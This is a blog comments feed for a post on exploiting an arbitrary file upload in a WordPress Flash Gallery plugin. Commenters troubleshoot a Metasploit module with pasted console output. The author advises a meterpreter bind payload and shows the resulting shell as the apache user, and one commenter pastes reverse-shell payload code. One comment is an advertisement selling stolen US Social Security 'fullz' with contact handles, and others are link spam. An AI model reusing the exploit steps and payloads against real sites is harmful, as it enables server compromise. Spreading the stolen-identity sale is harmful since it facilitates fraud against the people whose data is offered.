tag:blogger.com,1999:blog-3012395024337025063.post9132864049835805973..comments2023-06-17T06:18:04.591-07:00Comments on POC HACK: WordPress 1 Flash Gallery Plugin Arbitrary File Upload VulnerabilityAngelohttp://www.blogger.com/profile/05892942548123519223noreply@blogger.comBlogger9125tag:blogger.com,1999:blog-3012395024337025063.post-31277048097582702242020-08-20T20:16:54.227-07:002020-08-20T20:16:54.227-07:00Hello Everyone !
USA SSN Leads/Fullz available, a...Hello Everyone !<br /><br />USA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.<br /><br />All SSN's are Tested & Verified.<br /><br />**DETAILS IN LEADS/FULLZ**<br /><br />->FULL NAME<br />->SSN<br />->DATE OF BIRTH<br />->DRIVING LICENSE NUMBER<br />->ADDRESS WITH ZIP<br />->PHONE NUMBER, EMAIL<br />->EMPLOYEE DETAILS<br /><br />*Price for SSN lead $2<br />*You can ask for sample before any deal<br />*If you buy in bulk, will give you discount<br />*Sampling is just for serious buyers<br /><br />->Hope for the long term business<br />->You can buy for your specific states too<br /><br />**Contact 24/7**<br /><br />Whatsapp > +923172721122<br /><br />Email > leads.sellers1212@gmail.com<br /><br />Telegram > @leadsupplier<br /><br />ICQ > 752822040No Namehttps://www.blogger.com/profile/14264017069184971911noreply@blogger.comtag:blogger.com,1999:blog-3012395024337025063.post-91936880883969906692013-11-17T05:26:45.686-08:002013-11-17T05:26:45.686-08:00awesome post buddy
indias best hackersawesome post buddy<br /><a href="http://born2hack.hpage.com/top-10-ethical-hackers-of-india_18213017.html" title="indias best hackers " rel="nofollow">indias best hackers </a>born2hackhttps://www.blogger.com/profile/11944254494948748375noreply@blogger.comtag:blogger.com,1999:blog-3012395024337025063.post-17155616347922522832013-11-17T05:11:58.789-08:002013-11-17T05:11:58.789-08:00the flash gallery is nice
as you are dealing in h...the flash gallery is nice <br />as you are dealing in hacking you must see this too...<br />http://born2hack.hpage.com/top-10-ethical-hackers-of-india_18213017.htmlborn2hackhttps://www.blogger.com/profile/11944254494948748375noreply@blogger.comtag:blogger.com,1999:blog-3012395024337025063.post-78820307703527582172012-04-20T05:08:58.640-07:002012-04-20T05:08:58.640-07:00Metasploit upgraded those payloads, but they still...Metasploit upgraded those payloads, but they still don't work.<br />I just tested now and you can use this payload php/meterpreter/bind_tcp<br />Once you get your meterpreter session just type "shell" then hit enter, you will get your shell.<br /><br />EX:<br />meterpreter > shell<br />Process 15882 created.<br />Channel 0 created.<br /><br />id<br />uid=48(apache) gid=48(apache) groups=48(apache)<br />ls<br />20111011082340.phpAngelohttps://www.blogger.com/profile/05892942548123519223noreply@blogger.comtag:blogger.com,1999:blog-3012395024337025063.post-27709450779662615672012-04-17T08:39:29.269-07:002012-04-17T08:39:29.269-07:00hi Angelo one question.
You was modify the payloa...hi Angelo one question.<br /><br />You was modify the payloads reverse_php.rb in /../payloads/singles/php but you was copy/paste in this file the exploit in this line<br /><br /> shell=<<-END_OF_PHP_CODE<br /><br /> END_OF_PHP_CODE<br /><br /><br />but the modified code is different from what I see...<br /><br />i show you my code <br /><br />def php_reverse_shell<br /><br /> if (!datastore['LHOST'] or datastore['LHOST'].empty?)<br /> # datastore is empty on msfconsole startup<br /> ipaddr = '127.0.0.1'<br /> port = 4444<br /> else<br /> ipaddr = datastore['LHOST']<br /> port = datastore['LPORT']<br /> end<br /> exec_funcname = Rex::Text.rand_text_alpha(rand(10)+5)<br /> <br /> uri = "tcp://#{ipaddr}"<br /> socket_family = "AF_INET"<br /><br /> if Rex::Socket.is_ipv6?(ipaddr)<br /> uri = "tcp://[#{ipaddr}]"<br /> socket_family = "AF_INET6"<br /> end <br /><br /> shell=<<-END_OF_PHP_CODE<br /><br />-----------------o----------------<br /><br />your code does not show this in the beginning<br />show us your code <br />thxBiteAciDhttps://www.blogger.com/profile/13880964055862282489noreply@blogger.comtag:blogger.com,1999:blog-3012395024337025063.post-50602753014234405532012-01-09T02:23:12.101-08:002012-01-09T02:23:12.101-08:00What is the payload you are trying to use?What is the payload you are trying to use?Angelohttps://www.blogger.com/profile/05892942548123519223noreply@blogger.comtag:blogger.com,1999:blog-3012395024337025063.post-11479990520050773232012-01-07T16:17:43.834-08:002012-01-07T16:17:43.834-08:00I'm trying to start exploit but it output the ...I'm trying to start exploit but it output the next error<br /><br />msf exploit(flash_galery_wordpress) > exploit<br /><br />[*] Started reverse handler on 192.168.1.3:4444 <br />[*] Successfully uploaded shell.<br />[*] Trying to access shell at ...<br />[-] Exploit exception: can't convert nil into String<br />[*] Exploit completed, but no session was created.<br />msf exploit(flash_galery_wordpress) ><br /><br />Please tell me whats wrong?SPQRhttps://www.blogger.com/profile/17162796510953319442noreply@blogger.comtag:blogger.com,1999:blog-3012395024337025063.post-11277736052288753382011-11-27T04:36:53.912-08:002011-11-27T04:36:53.912-08:00airwolf_reverse shell link plz broairwolf_reverse shell link plz brohahahhttps://www.blogger.com/profile/01319057755359847841noreply@blogger.comtag:blogger.com,1999:blog-3012395024337025063.post-36624647161156904532011-11-27T04:34:11.140-08:002011-11-27T04:34:11.140-08:00hi bro airwolf reverse shell public?
senme plz lin...hi bro airwolf reverse shell public?<br />senme plz linkhahahhttps://www.blogger.com/profile/01319057755359847841noreply@blogger.com